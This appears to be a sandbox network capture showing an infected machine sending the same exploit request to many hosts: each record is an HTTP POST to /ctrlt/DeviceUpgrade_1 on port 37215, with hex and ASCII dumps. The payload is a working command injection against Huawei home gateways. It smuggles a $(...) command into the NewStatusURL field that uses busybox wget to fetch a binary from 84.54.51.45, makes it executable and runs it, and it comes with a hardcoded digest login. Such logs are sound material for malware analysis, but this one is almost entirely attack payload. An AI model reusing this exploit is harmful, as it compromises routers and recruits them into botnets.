                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1648192.168.2.1556792156.223.23.5837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461204052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1649192.168.2.1532798156.21.165.6037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461219072 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1650192.168.2.1543152156.133.205.13337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461226940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1651192.168.2.1543348156.44.24.15137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461226940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1652192.168.2.1556152156.32.151.21437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461252928 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1653192.168.2.1539338156.83.223.3537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461252928 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1654192.168.2.1552976156.189.82.5537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461276054 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1655192.168.2.1550114156.202.137.17637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461288929 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1656192.168.2.1542968156.243.240.20637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461301088 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1657192.168.2.1550830156.124.229.17837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461324930 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 